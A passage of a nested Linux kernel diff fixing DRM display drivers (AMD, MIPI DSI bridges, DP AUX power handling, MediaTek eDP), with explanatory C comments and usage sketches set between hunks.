+@@ -382,6 +382,11 @@ bool cm_helper_translate_curve_to_hw_format(struct dc_context *ctx,
+ 				i += increment) {
+ 			if (j == hw_points - 1)
+ 				break;
++			if (i >= TRANSFER_FUNC_POINTS) {
++				DC_LOG_ERROR("Index out of bounds: i=%d, TRANSFER_FUNC_POINTS=%d\n",
++					     i, TRANSFER_FUNC_POINTS);
++				return false;
++			}
+ 			rgb_resulted[j].red = output_tf->tf_pts.red[i];
+ 			rgb_resulted[j].green = output_tf->tf_pts.green[i];
+ 			rgb_resulted[j].blue = output_tf->tf_pts.blue[i];
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c
+index 19d034341e640..cb2f6cd73af54 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c
+@@ -291,6 +291,7 @@ static struct _vcs_dpi_soc_bounding_box_st dcn3_15_soc = {
+ 	.do_urgent_latency_adjustment = false,
+ 	.urgent_latency_adjustment_fabric_clock_component_us = 0,
+ 	.urgent_latency_adjustment_fabric_clock_reference_mhz = 0,
++	.dispclk_dppclk_vco_speed_mhz = 2400.0,
+ 	.num_chans = 4,
+ 	.dummy_pstate_latency_us = 10.0
+ };
+@@ -438,6 +439,7 @@ static struct _vcs_dpi_soc_bounding_box_st dcn3_16_soc = {
+ 	.do_urgent_latency_adjustment = false,
+ 	.urgent_latency_adjustment_fabric_clock_component_us = 0,
+ 	.urgent_latency_adjustment_fabric_clock_reference_mhz = 0,
++	.dispclk_dppclk_vco_speed_mhz = 2500.0,
+ };
+ 
+ void dcn31_zero_pipe_dcc_fraction(display_e2e_pipe_params_st *pipes,
+diff --git a/drivers/gpu/drm/arm/malidp_mw.c b/drivers/gpu/drm/arm/malidp_mw.c
+index ef76d0e6ee2fc..389d32994135b 100644
+--- a/drivers/gpu/drm/arm/malidp_mw.c
++++ b/drivers/gpu/drm/arm/malidp_mw.c
+@@ -72,7 +72,10 @@ static void malidp_mw_connector_reset(struct drm_connector *connector)
+ 		__drm_atomic_helper_connector_destroy_state(connector->state);
+ 
+ 	kfree(connector->state);
+-	__drm_atomic_helper_connector_reset(connector, &mw_state->base);
++	connector->state = NULL;
++
++	if (mw_state)
++		__drm_atomic_helper_connector_reset(connector, &mw_state->base);
+ }
+ 
+ static enum drm_connector_status
+diff --git a/drivers/gpu/drm/bridge/analogix/anx7625.c b/drivers/gpu/drm/bridge/analogix/anx7625.c
+index 77a304ac4d75e..193015c75b454 100644
+--- a/drivers/gpu/drm/bridge/analogix/anx7625.c
++++ b/drivers/gpu/drm/bridge/analogix/anx7625.c
+@@ -2077,10 +2077,8 @@ static int anx7625_setup_dsi_device(struct anx7625_data *ctx)
+ 	};
+ 
+ 	host = of_find_mipi_dsi_host_by_node(ctx->pdata.mipi_host_node);
+-	if (!host) {
+-		DRM_DEV_ERROR(dev, "fail to find dsi host.\n");
+-		return -EPROBE_DEFER;
+-	}
++	if (!host)
++		return dev_err_probe(dev, -EPROBE_DEFER, "fail to find dsi host.\n");
+ 
+ 	dsi = devm_mipi_dsi_device_register_full(dev, host, &info);
+ 	if (IS_ERR(dsi)) {
+diff --git a/drivers/gpu/drm/bridge/cadence/cdns-mhdp8546-core.c b/drivers/gpu/drm/bridge/cadence/cdns-mhdp8546-core.c
+index 31442a9225029..1b7c14d7c5ee3 100644
+--- a/drivers/gpu/drm/bridge/cadence/cdns-mhdp8546-core.c
++++ b/drivers/gpu/drm/bridge/cadence/cdns-mhdp8546-core.c
+@@ -2042,6 +2042,9 @@ static void cdns_mhdp_atomic_enable(struct drm_bridge *bridge,
+ 	mhdp_state = to_cdns_mhdp_bridge_state(new_state);
+ 
+ 	mhdp_state->current_mode = drm_mode_duplicate(bridge->dev, mode);
++	if (!mhdp_state->current_mode)
++		return;
++
+ 	drm_mode_set_name(mhdp_state->current_mode);
+ 
+ 	dev_dbg(mhdp->dev, "%s: Enabling mode %s\n", __func__, mode->name);
+diff --git a/drivers/gpu/drm/bridge/chipone-icn6211.c b/drivers/gpu/drm/bridge/chipone-icn6211.c
+index bf920c3503aa3..3459a696b34fc 100644
+--- a/drivers/gpu/drm/bridge/chipone-icn6211.c
++++ b/drivers/gpu/drm/bridge/chipone-icn6211.c
+@@ -563,10 +563,8 @@ static int chipone_dsi_host_attach(struct chipone *icn)
+ 
+ 	host = of_find_mipi_dsi_host_by_node(host_node);
+ 	of_node_put(host_node);
+-	if (!host) {
+-		dev_err(dev, "failed to find dsi host\n");
+-		return -EPROBE_DEFER;
+-	}
++	if (!host)
++		return dev_err_probe(dev, -EPROBE_DEFER, "failed to find dsi host\n");
+ 
+ 	dsi = mipi_dsi_device_register_full(host, &info);
+ 	if (IS_ERR(dsi)) {
+diff --git a/drivers/gpu/drm/bridge/lontium-lt8912b.c b/drivers/gpu/drm/bridge/lontium-lt8912b.c
+index ac76c23635892..55a7fa4670a7a 100644
+--- a/drivers/gpu/drm/bridge/lontium-lt8912b.c
++++ b/drivers/gpu/drm/bridge/lontium-lt8912b.c
+@@ -485,10 +485,8 @@ static int lt8912_attach_dsi(struct lt8912 *lt)
+ 						 };
+ 
+ 	host = of_find_mipi_dsi_host_by_node(lt->host_node);
+-	if (!host) {
+-		dev_err(dev, "failed to find dsi host\n");
+-		return -EPROBE_DEFER;
+-	}
++	if (!host)
++		return dev_err_probe(dev, -EPROBE_DEFER, "failed to find dsi host\n");
+ 
+ 	dsi = devm_mipi_dsi_device_register_full(dev, host, &info);
+ 	if (IS_ERR(dsi)) {
+diff --git a/drivers/gpu/drm/bridge/lontium-lt9611.c b/drivers/gpu/drm/bridge/lontium-lt9611.c
+index ae8c6d9d4095f..e40ceb56ff55f 100644
+--- a/drivers/gpu/drm/bridge/lontium-lt9611.c
++++ b/drivers/gpu/drm/bridge/lontium-lt9611.c
+@@ -777,10 +777,8 @@ static struct mipi_dsi_device *lt9611_attach_dsi(struct lt9611 *lt9611,
+ 	int ret;
+ 
+ 	host = of_find_mipi_dsi_host_by_node(dsi_node);
+-	if (!host) {
+-		dev_err(lt9611->dev, "failed to find dsi host\n");
+-		return ERR_PTR(-EPROBE_DEFER);
+-	}
++	if (!host)
++		return ERR_PTR(dev_err_probe(lt9611->dev, -EPROBE_DEFER, "failed to find dsi host\n"));
+ 
+ 	dsi = devm_mipi_dsi_device_register_full(dev, host, &info);
+ 	if (IS_ERR(dsi)) {
+diff --git a/drivers/gpu/drm/bridge/lontium-lt9611uxc.c b/drivers/gpu/drm/bridge/lontium-lt9611uxc.c
+index 818848b2c04dd..cb75da940b890 100644
+--- a/drivers/gpu/drm/bridge/lontium-lt9611uxc.c
++++ b/drivers/gpu/drm/bridge/lontium-lt9611uxc.c
+@@ -263,10 +263,8 @@ static struct mipi_dsi_device *lt9611uxc_attach_dsi(struct lt9611uxc *lt9611uxc,
+ 	int ret;
+ 
+ 	host = of_find_mipi_dsi_host_by_node(dsi_node);
+-	if (!host) {
+-		dev_err(dev, "failed to find dsi host\n");
+-		return ERR_PTR(-EPROBE_DEFER);
+-	}
++	if (!host)
++		return ERR_PTR(dev_err_probe(dev, -EPROBE_DEFER, "failed to find dsi host\n"));
+ 
+ 	dsi = devm_mipi_dsi_device_register_full(dev, host, &info);
+ 	if (IS_ERR(dsi)) {
+diff --git a/drivers/gpu/drm/bridge/tc358775.c b/drivers/gpu/drm/bridge/tc358775.c
+index 02dc12b8151e7..40d6da7743325 100644
+--- a/drivers/gpu/drm/bridge/tc358775.c
++++ b/drivers/gpu/drm/bridge/tc358775.c
+@@ -455,10 +455,6 @@ static void tc_bridge_enable(struct drm_bridge *bridge)
+ 	dev_dbg(tc->dev, "bus_formats %04x bpc %d\n",
+ 		connector->display_info.bus_formats[0],
+ 		tc->bpc);
+-	/*
+-	 * Default hardware register settings of tc358775 configured
+-	 * with MEDIA_BUS_FMT_RGB888_1X7X4_JEIDA jeida-24 format
+-	 */
+ 	if (connector->display_info.bus_formats[0] ==
+ 		MEDIA_BUS_FMT_RGB888_1X7X4_SPWG) {
+ 		/* VESA-24 */
+@@ -469,14 +465,15 @@ static void tc_bridge_enable(struct drm_bridge *bridge)
+ 		d2l_write(tc->i2c, LV_MX1619, LV_MX(LVI_B6, LVI_B7, LVI_B1, LVI_B2));
+ 		d2l_write(tc->i2c, LV_MX2023, LV_MX(LVI_B3, LVI_B4, LVI_B5, LVI_L0));
+ 		d2l_write(tc->i2c, LV_MX2427, LV_MX(LVI_HS, LVI_VS, LVI_DE, LVI_R6));
+-	} else { /*  MEDIA_BUS_FMT_RGB666_1X7X3_SPWG - JEIDA-18 */
+-		d2l_write(tc->i2c, LV_MX0003, LV_MX(LVI_R0, LVI_R1, LVI_R2, LVI_R3));
+-		d2l_write(tc->i2c, LV_MX0407, LV_MX(LVI_R4, LVI_L0, LVI_R5, LVI_G0));
+-		d2l_write(tc->i2c, LV_MX0811, LV_MX(LVI_G1, LVI_G2, LVI_L0, LVI_L0));
+-		d2l_write(tc->i2c, LV_MX1215, LV_MX(LVI_G3, LVI_G4, LVI_G5, LVI_B0));
+-		d2l_write(tc->i2c, LV_MX1619, LV_MX(LVI_L0, LVI_L0, LVI_B1, LVI_B2));
+-		d2l_write(tc->i2c, LV_MX2023, LV_MX(LVI_B3, LVI_B4, LVI_B5, LVI_L0));
+-		d2l_write(tc->i2c, LV_MX2427, LV_MX(LVI_HS, LVI_VS, LVI_DE, LVI_L0));
++	} else {
++		/* JEIDA-18 and JEIDA-24 */
++		d2l_write(tc->i2c, LV_MX0003, LV_MX(LVI_R2, LVI_R3, LVI_R4, LVI_R5));
++		d2l_write(tc->i2c, LV_MX0407, LV_MX(LVI_R6, LVI_R1, LVI_R7, LVI_G2));
++		d2l_write(tc->i2c, LV_MX0811, LV_MX(LVI_G3, LVI_G4, LVI_G0, LVI_G1));
++		d2l_write(tc->i2c, LV_MX1215, LV_MX(LVI_G5, LVI_G6, LVI_G7, LVI_B2));
++		d2l_write(tc->i2c, LV_MX1619, LV_MX(LVI_B0, LVI_B1, LVI_B3, LVI_B4));
++		d2l_write(tc->i2c, LV_MX2023, LV_MX(LVI_B5, LVI_B6, LVI_B7, LVI_L0));
++		d2l_write(tc->i2c, LV_MX2427, LV_MX(LVI_HS, LVI_VS, LVI_DE, LVI_R0));
+ 	}
+ 
+ 	d2l_write(tc->i2c, VFUEN, VFUEN_EN);
+@@ -611,10 +608,8 @@ static int tc_attach_host(struct tc_data *tc)
+ 						};
+ 
+ 	host = of_find_mipi_dsi_host_by_node(tc->host_node);
+-	if (!host) {
+-		dev_err(dev, "failed to find dsi host\n");
+-		return -EPROBE_DEFER;
+-	}
++	if (!host)
++		return dev_err_probe(dev, -EPROBE_DEFER, "failed to find dsi host\n");
+ 
+ 	dsi = devm_mipi_dsi_device_register_full(dev, host, &info);
+ 	if (IS_ERR(dsi)) {
+diff --git a/drivers/gpu/drm/bridge/ti-dlpc3433.c b/drivers/gpu/drm/bridge/ti-dlpc3433.c
+index 186a9e2ff24dc..d1684e66d9e3d 100644
+--- a/drivers/gpu/drm/bridge/ti-dlpc3433.c
++++ b/drivers/gpu/drm/bridge/ti-dlpc3433.c
+@@ -319,12 +319,11 @@ static int dlpc_host_attach(struct dlpc *dlpc)
+ 		.channel = 0,
+ 		.node = NULL,
+ 	};
++	int ret;
+ 
+ 	host = of_find_mipi_dsi_host_by_node(dlpc->host_node);
+-	if (!host) {
+-		DRM_DEV_ERROR(dev, "failed to find dsi host\n");
+-		return -EPROBE_DEFER;
+-	}
++	if (!host)
++		return dev_err_probe(dev, -EPROBE_DEFER, "failed to find dsi host\n");
+ 
+ 	dlpc->dsi = mipi_dsi_device_register_full(host, &info);
+ 	if (IS_ERR(dlpc->dsi)) {
+@@ -336,7 +335,11 @@ static int dlpc_host_attach(struct dlpc *dlpc)
+ 	dlpc->dsi->format = MIPI_DSI_FMT_RGB565;
+ 	dlpc->dsi->lanes = dlpc->dsi_lanes;
+ 
+-	return devm_mipi_dsi_attach(dev, dlpc->dsi);
++	ret = devm_mipi_dsi_attach(dev, dlpc->dsi);
++	if (ret)
++		DRM_DEV_ERROR(dev, "failed to attach dsi host\n");
++
++	return ret;
+ }
+ 
+ static int dlpc3433_probe(struct i2c_client *client)
+@@ -367,10 +370,8 @@ static int dlpc3433_probe(struct i2c_client *client)
+ 	drm_bridge_add(&dlpc->bridge);
+ 
+ 	ret = dlpc_host_attach(dlpc);
+-	if (ret) {
+-		DRM_DEV_ERROR(dev, "failed to attach dsi host\n");
++	if (ret)
+ 		goto err_remove_bridge;
+-	}
+ 
+ 	return 0;
+ 
+diff --git a/drivers/gpu/drm/bridge/ti-sn65dsi83.c b/drivers/gpu/drm/bridge/ti-sn65dsi83.c
+index 3f43b44145a89..52008a72bd49a 100644
+--- a/drivers/gpu/drm/bridge/ti-sn65dsi83.c
++++ b/drivers/gpu/drm/bridge/ti-sn65dsi83.c
+@@ -478,7 +478,6 @@ static void sn65dsi83_atomic_pre_enable(struct drm_bridge *bridge,
+ 		dev_err(ctx->dev, "failed to lock PLL, ret=%i\n", ret);
+ 		/* On failure, disable PLL again and exit. */
+ 		regmap_write(ctx->regmap, REG_RC_PLL_EN, 0x00);
+-		regulator_disable(ctx->vcc);
+ 		return;
+ 	}
+ 
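/*
 * Why the regulator_disable() above is dropped: a failed PLL lock in
 * atomic_pre_enable() is still followed by the bridge's normal disable
 * path, which also disables the vcc supply, so disabling it here as
 * well unbalanced the regulator enable count. One enable, one disable.
 */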
+diff --git a/drivers/gpu/drm/display/drm_dp_helper.c b/drivers/gpu/drm/display/drm_dp_helper.c
+index 16565a0a5da6d..e839981c7b2f7 100644
+--- a/drivers/gpu/drm/display/drm_dp_helper.c
++++ b/drivers/gpu/drm/display/drm_dp_helper.c
+@@ -532,6 +532,15 @@ static int drm_dp_dpcd_access(struct drm_dp_aux *aux, u8 request,
+ 
+ 	mutex_lock(&aux->hw_mutex);
+ 
++	/*
++	 * If the device attached to the aux bus is powered down then there's
++	 * no reason to attempt a transfer. Error out immediately.
++	 */
++	if (aux->powered_down) {
++		ret = -EBUSY;
++		goto unlock;
++	}
++
+ 	/*
+ 	 * The specification doesn't give any recommendation on how often to
+ 	 * retry native transactions. We used to retry 7 times like for
+@@ -599,6 +608,29 @@ int drm_dp_dpcd_probe(struct drm_dp_aux *aux, unsigned int offset)
+ }
+ EXPORT_SYMBOL(drm_dp_dpcd_probe);
+ 
++/**
++ * drm_dp_dpcd_set_powered() - Set whether the DP device is powered
++ * @aux: DisplayPort AUX channel; for convenience it's OK to pass NULL here
++ *       and the function will be a no-op.
++ * @powered: true if powered; false if not
++ *
++ * If the endpoint device on the DP AUX bus is known to be powered down
++ * then this function can be called to make future transfers fail immediately
++ * instead of needing to time out.
++ *
++ * If this function is never called then a device defaults to being powered.
++ */
++void drm_dp_dpcd_set_powered(struct drm_dp_aux *aux, bool powered)
++{
++	if (!aux)
++		return;
++
++	mutex_lock(&aux->hw_mutex);
++	aux->powered_down = !powered;
++	mutex_unlock(&aux->hw_mutex);
++}
++EXPORT_SYMBOL(drm_dp_dpcd_set_powered);
++
+ /**
+  * drm_dp_dpcd_read() - read a series of bytes from the DPCD
+  * @aux: DisplayPort AUX channel (SST or MST)
+@@ -1855,6 +1887,9 @@ static int drm_dp_i2c_xfer(struct i2c_adapter *adapter, struct i2c_msg *msgs,
+ 	struct drm_dp_aux_msg msg;
+ 	int err = 0;
+ 
++	if (aux->powered_down)
++		return -EBUSY;
++
+ 	dp_aux_i2c_transfer_size = clamp(dp_aux_i2c_transfer_size, 1, DP_AUX_MAX_PAYLOAD_BYTES);
+ 
+ 	memset(&msg, 0, sizeof(msg));
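/*
 * A minimal sketch (not part of the patch) of how a panel driver is
 * expected to pair drm_dp_dpcd_set_powered() with its power rail, so
 * DPCD and AUX-i2c transfers fail fast with -EBUSY while the panel is
 * off instead of timing out. All example_* names are hypothetical;
 * the panel-edp and atna33xc20 hunks further down follow the same
 * ordering.
 */
#include <drm/display/drm_dp_helper.h>
#include <linux/regulator/consumer.h>

struct example_panel {
	struct drm_dp_aux *aux;
	struct regulator *supply;
};

static int example_panel_suspend(struct example_panel *p)
{
	/* Mark the endpoint unpowered *before* cutting its supply. */
	drm_dp_dpcd_set_powered(p->aux, false);
	return regulator_disable(p->supply);
}

static int example_panel_resume(struct example_panel *p)
{
	int ret = regulator_enable(p->supply);

	if (ret)
		return ret;
	/* Only now are AUX transfers meaningful again. */
	drm_dp_dpcd_set_powered(p->aux, true);
	return 0;
}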
+diff --git a/drivers/gpu/drm/drm_bridge.c b/drivers/gpu/drm/drm_bridge.c
+index 7044e339a82cd..f802548798044 100644
+--- a/drivers/gpu/drm/drm_bridge.c
++++ b/drivers/gpu/drm/drm_bridge.c
+@@ -755,11 +755,17 @@ void drm_atomic_bridge_chain_post_disable(struct drm_bridge *bridge,
+ 				 */
+ 				list_for_each_entry_from(next, &encoder->bridge_chain,
+ 							 chain_node) {
+-					if (next->pre_enable_prev_first) {
++					if (!next->pre_enable_prev_first) {
+ 						next = list_prev_entry(next, chain_node);
+ 						limit = next;
+ 						break;
+ 					}
++
++					if (list_is_last(&next->chain_node,
++							 &encoder->bridge_chain)) {
++						limit = next;
++						break;
++					}
+ 				}
+ 
+ 				/* Call these bridges in reverse order */
+@@ -842,7 +848,7 @@ void drm_atomic_bridge_chain_pre_enable(struct drm_bridge *bridge,
+ 					/* Found first bridge that does NOT
+ 					 * request prev to be enabled first
+ 					 */
+-					limit = list_prev_entry(next, chain_node);
++					limit = next;
+ 					break;
+ 				}
+ 			}
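/*
 * The two hunks above fix the walk that honours a bridge's
 * pre_enable_prev_first flag. For context, a downstream bridge opts in
 * as sketched below; only the flag and the drm_bridge API are real,
 * the example_* names are hypothetical.
 */
#include <drm/drm_bridge.h>

struct example_bridge {
	struct drm_bridge bridge;
};

static const struct drm_bridge_funcs example_bridge_funcs;

static void example_bridge_register(struct example_bridge *ctx)
{
	ctx->bridge.funcs = &example_bridge_funcs;
	/*
	 * Ask the core to call the previous bridge's pre_enable first
	 * (and, symmetrically, its post_disable last).
	 */
	ctx->bridge.pre_enable_prev_first = true;
	drm_bridge_add(&ctx->bridge);
}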
+diff --git a/drivers/gpu/drm/drm_mipi_dsi.c b/drivers/gpu/drm/drm_mipi_dsi.c
+index ef7ec68867df0..112f213cc8d9b 100644
+--- a/drivers/gpu/drm/drm_mipi_dsi.c
++++ b/drivers/gpu/drm/drm_mipi_dsi.c
+@@ -653,7 +653,7 @@ EXPORT_SYMBOL(mipi_dsi_set_maximum_return_packet_size);
+  *
+  * Return: 0 on success or a negative error code on failure.
+  */
+-ssize_t mipi_dsi_compression_mode(struct mipi_dsi_device *dsi, bool enable)
++int mipi_dsi_compression_mode(struct mipi_dsi_device *dsi, bool enable)
+ {
+ 	/* Note: Needs updating for non-default PPS or algorithm */
+ 	u8 tx[2] = { enable << 0, 0 };
+@@ -678,8 +678,8 @@ EXPORT_SYMBOL(mipi_dsi_compression_mode);
+  *
+  * Return: 0 on success or a negative error code on failure.
+  */
+-ssize_t mipi_dsi_picture_parameter_set(struct mipi_dsi_device *dsi,
+-				       const struct drm_dsc_picture_parameter_set *pps)
++int mipi_dsi_picture_parameter_set(struct mipi_dsi_device *dsi,
++				   const struct drm_dsc_picture_parameter_set *pps)
+ {
+ 	struct mipi_dsi_msg msg = {
+ 		.channel = dsi->channel,
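/*
 * With the return type narrowed from ssize_t to int, callers can use
 * the plain negative-errno idiom; there is no byte count to conflate
 * with an error. A caller sketch (example_enable_dsc is made up):
 */
#include <drm/drm_mipi_dsi.h>
#include <drm/display/drm_dsc.h>

static int example_enable_dsc(struct mipi_dsi_device *dsi,
			      const struct drm_dsc_picture_parameter_set *pps)
{
	int ret;

	ret = mipi_dsi_picture_parameter_set(dsi, pps);
	if (ret < 0)
		return ret;

	return mipi_dsi_compression_mode(dsi, true);
}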
+diff --git a/drivers/gpu/drm/i915/gt/uc/abi/guc_klvs_abi.h b/drivers/gpu/drm/i915/gt/uc/abi/guc_klvs_abi.h
+index 4a59478c3b5c4..bbeceb640d31e 100644
+--- a/drivers/gpu/drm/i915/gt/uc/abi/guc_klvs_abi.h
++++ b/drivers/gpu/drm/i915/gt/uc/abi/guc_klvs_abi.h
+@@ -29,9 +29,9 @@
+  */
+ 
+ #define GUC_KLV_LEN_MIN				1u
+-#define GUC_KLV_0_KEY				(0xffff << 16)
+-#define GUC_KLV_0_LEN				(0xffff << 0)
+-#define GUC_KLV_n_VALUE				(0xffffffff << 0)
++#define GUC_KLV_0_KEY				(0xffffu << 16)
++#define GUC_KLV_0_LEN				(0xffffu << 0)
++#define GUC_KLV_n_VALUE				(0xffffffffu << 0)
+ 
+ /**
+  * DOC: GuC Self Config KLVs
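/*
 * Why the 'u' suffixes matter: 0xffff has type (signed) int, so
 * 0xffff << 16 shifts into the sign bit -- undefined behaviour in
 * standard C -- and on the usual two's-complement build the negative
 * value sign-extends when widened. A self-contained illustration:
 */
#include <linux/types.h>

static void example_shift_promotion(void)
{
	u64 bad  = 0xffff << 16;	/* typically 0xffffffffffff0000 */
	u64 good = 0xffffu << 16;	/* always    0x00000000ffff0000 */

	(void)bad;
	(void)good;
}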
+diff --git a/drivers/gpu/drm/mediatek/Kconfig b/drivers/gpu/drm/mediatek/Kconfig
+index 369e495d0c3e8..d1eededee9434 100644
+--- a/drivers/gpu/drm/mediatek/Kconfig
++++ b/drivers/gpu/drm/mediatek/Kconfig
+@@ -27,6 +27,7 @@ config DRM_MEDIATEK_DP
+ 	select PHY_MTK_DP
+ 	select DRM_DISPLAY_HELPER
+ 	select DRM_DISPLAY_DP_HELPER
++	select DRM_DP_AUX_BUS
+ 	help
+ 	  DRM/KMS Display Port driver for MediaTek SoCs.
+ 
+diff --git a/drivers/gpu/drm/mediatek/mtk_dp.c b/drivers/gpu/drm/mediatek/mtk_dp.c
+index 519e23a2a017c..c24eeb7ffde7d 100644
+--- a/drivers/gpu/drm/mediatek/mtk_dp.c
++++ b/drivers/gpu/drm/mediatek/mtk_dp.c
+@@ -4,6 +4,7 @@
+  * Copyright (c) 2022 BayLibre
+  */
+ 
++#include <drm/display/drm_dp_aux_bus.h>
+ #include <drm/display/drm_dp.h>
+ #include <drm/display/drm_dp_helper.h>
+ #include <drm/drm_atomic_helper.h>
+@@ -1284,9 +1285,11 @@ static void mtk_dp_power_disable(struct mtk_dp *mtk_dp)
+ 
+ static void mtk_dp_initialize_priv_data(struct mtk_dp *mtk_dp)
+ {
++	bool plugged_in = (mtk_dp->bridge.type == DRM_MODE_CONNECTOR_eDP);
++
+ 	mtk_dp->train_info.link_rate = DP_LINK_BW_5_4;
+ 	mtk_dp->train_info.lane_count = mtk_dp->max_lanes;
+-	mtk_dp->train_info.cable_plugged_in = false;
++	mtk_dp->train_info.cable_plugged_in = plugged_in;
+ 
+ 	mtk_dp->info.format = DP_PIXELFORMAT_RGB;
+ 	memset(&mtk_dp->info.vm, 0, sizeof(struct videomode));
+@@ -1588,6 +1591,16 @@ static int mtk_dp_parse_capabilities(struct mtk_dp *mtk_dp)
+ 	u8 val;
+ 	ssize_t ret;
+ 
++	/*
++	 * If this is an eDP port and the capabilities were already parsed,
++	 * we can skip reading them again: eDP panels aren't hotpluggable,
++	 * so the caps and training info never change for the life of a boot
++	 */
++	if (mtk_dp->bridge.type == DRM_MODE_CONNECTOR_eDP &&
++	    mtk_dp->rx_cap[DP_MAX_LINK_RATE] &&
++	    mtk_dp->train_info.sink_ssc)
++		return 0;
++
+ 	ret = drm_dp_read_dpcd_caps(&mtk_dp->aux, mtk_dp->rx_cap);
+ 	if (ret < 0)
+ 		return ret;
+@@ -2037,16 +2050,15 @@ static struct edid *mtk_dp_get_edid(struct drm_bridge *bridge,
+ static ssize_t mtk_dp_aux_transfer(struct drm_dp_aux *mtk_aux,
+ 				   struct drm_dp_aux_msg *msg)
+ {
+-	struct mtk_dp *mtk_dp;
++	struct mtk_dp *mtk_dp = container_of(mtk_aux, struct mtk_dp, aux);
+ 	bool is_read;
+ 	u8 request;
+ 	size_t accessed_bytes = 0;
+ 	int ret;
+ 
+-	mtk_dp = container_of(mtk_aux, struct mtk_dp, aux);
+-
+-	if (!mtk_dp->train_info.cable_plugged_in) {
+-		ret = -EAGAIN;
++	if (mtk_dp->bridge.type != DRM_MODE_CONNECTOR_eDP &&
++	    !mtk_dp->train_info.cable_plugged_in) {
++		ret = -EIO;
+ 		goto err;
+ 	}
+ 
+@@ -2490,6 +2502,51 @@ static int mtk_dp_register_audio_driver(struct device *dev)
+ 	return PTR_ERR_OR_ZERO(mtk_dp->audio_pdev);
+ }
+ 
++static int mtk_dp_register_phy(struct mtk_dp *mtk_dp)
++{
++	struct device *dev = mtk_dp->dev;
++
++	mtk_dp->phy_dev = platform_device_register_data(dev, "mediatek-dp-phy",
++							PLATFORM_DEVID_AUTO,
++							&mtk_dp->regs,
++							sizeof(struct regmap *));
++	if (IS_ERR(mtk_dp->phy_dev))
++		return dev_err_probe(dev, PTR_ERR(mtk_dp->phy_dev),
++				     "Failed to create device mediatek-dp-phy\n");
++
++	mtk_dp_get_calibration_data(mtk_dp);
++
++	mtk_dp->phy = devm_phy_get(&mtk_dp->phy_dev->dev, "dp");
++	if (IS_ERR(mtk_dp->phy)) {
++		platform_device_unregister(mtk_dp->phy_dev);
++		return dev_err_probe(dev, PTR_ERR(mtk_dp->phy), "Failed to get phy\n");
++	}
++
++	return 0;
++}
++
++static int mtk_dp_edp_link_panel(struct drm_dp_aux *mtk_aux)
++{
++	struct mtk_dp *mtk_dp = container_of(mtk_aux, struct mtk_dp, aux);
++	struct device *dev = mtk_aux->dev;
++	int ret;
++
++	mtk_dp->next_bridge = devm_drm_of_get_bridge(dev, dev->of_node, 1, 0);
++
++	/* Power off the DP and AUX: either detection is done, or no panel present */
++	mtk_dp_update_bits(mtk_dp, MTK_DP_TOP_PWR_STATE,
++			   DP_PWR_STATE_BANDGAP_TPLL,
++			   DP_PWR_STATE_MASK);
++	mtk_dp_power_disable(mtk_dp);
++
++	if (IS_ERR(mtk_dp->next_bridge)) {
++		ret = PTR_ERR(mtk_dp->next_bridge);
++		mtk_dp->next_bridge = NULL;
++		return ret;
++	}
++	return 0;
++}
++
+ static int mtk_dp_probe(struct platform_device *pdev)
+ {
+ 	struct mtk_dp *mtk_dp;
+@@ -2508,21 +2565,14 @@ static int mtk_dp_probe(struct platform_device *pdev)
+ 		return dev_err_probe(dev, irq_num,
+ 				     "failed to request dp irq resource\n");
+ 
+-	mtk_dp->next_bridge = devm_drm_of_get_bridge(dev, dev->of_node, 1, 0);
+-	if (IS_ERR(mtk_dp->next_bridge) &&
+-	    PTR_ERR(mtk_dp->next_bridge) == -ENODEV)
+-		mtk_dp->next_bridge = NULL;
+-	else if (IS_ERR(mtk_dp->next_bridge))
+-		return dev_err_probe(dev, PTR_ERR(mtk_dp->next_bridge),
+-				     "Failed to get bridge\n");
+-
+ 	ret = mtk_dp_dt_parse(mtk_dp, pdev);
+ 	if (ret)
+ 		return dev_err_probe(dev, ret, "Failed to parse dt\n");
+ 
+-	drm_dp_aux_init(&mtk_dp->aux);
+ 	mtk_dp->aux.name = "aux_mtk_dp";
++	mtk_dp->aux.dev = dev;
+ 	mtk_dp->aux.transfer = mtk_dp_aux_transfer;
++	drm_dp_aux_init(&mtk_dp->aux);
+ 
+ 	spin_lock_init(&mtk_dp->irq_thread_lock);
+ 
+@@ -2547,23 +2597,9 @@ static int mtk_dp_probe(struct platform_device *pdev)
+ 		}
+ 	}
+ 
+-	mtk_dp->phy_dev = platform_device_register_data(dev, "mediatek-dp-phy",
+-							PLATFORM_DEVID_AUTO,
+-							&mtk_dp->regs,
+-							sizeof(struct regmap *));
+-	if (IS_ERR(mtk_dp->phy_dev))
+-		return dev_err_probe(dev, PTR_ERR(mtk_dp->phy_dev),
+-				     "Failed to create device mediatek-dp-phy\n");
+-
+-	mtk_dp_get_calibration_data(mtk_dp);
+-
+-	mtk_dp->phy = devm_phy_get(&mtk_dp->phy_dev->dev, "dp");
+-
+-	if (IS_ERR(mtk_dp->phy)) {
+-		platform_device_unregister(mtk_dp->phy_dev);
+-		return dev_err_probe(dev, PTR_ERR(mtk_dp->phy),
+-				     "Failed to get phy\n");
+-	}
++	ret = mtk_dp_register_phy(mtk_dp);
++	if (ret)
++		return ret;
+ 
+ 	mtk_dp->bridge.funcs = &mtk_dp_bridge_funcs;
+ 	mtk_dp->bridge.of_node = dev->of_node;
+@@ -2577,6 +2613,43 @@ static int mtk_dp_probe(struct platform_device *pdev)
+ 	mtk_dp->need_debounce = true;
+ 	timer_setup(&mtk_dp->debounce_timer, mtk_dp_debounce_timer, 0);
+ 
++	if (mtk_dp->bridge.type == DRM_MODE_CONNECTOR_eDP) {
++		/*
++		 * Set the data lanes to idle in case the bootloader didn't
++		 * properly close the eDP port to avoid stalls and then
++		 * reinitialize, reset and power on the AUX block.
++		 */
++		mtk_dp_set_idle_pattern(mtk_dp, true);
++		mtk_dp_initialize_aux_settings(mtk_dp);
++		mtk_dp_power_enable(mtk_dp);
++
++		/*
++		 * Power on the AUX to allow reading the EDID over the aux-bus.
++		 * Note that the matching power-off must happen in the
++		 * .done_probing() callback (mtk_dp_edp_link_panel), as only
++		 * there can we safely assume the EDID read has finished.
++		 */
++		mtk_dp_update_bits(mtk_dp, MTK_DP_TOP_PWR_STATE,
++				   DP_PWR_STATE_BANDGAP_TPLL_LANE,
++				   DP_PWR_STATE_MASK);
++
++		ret = devm_of_dp_aux_populate_bus(&mtk_dp->aux, mtk_dp_edp_link_panel);
++		if (ret) {
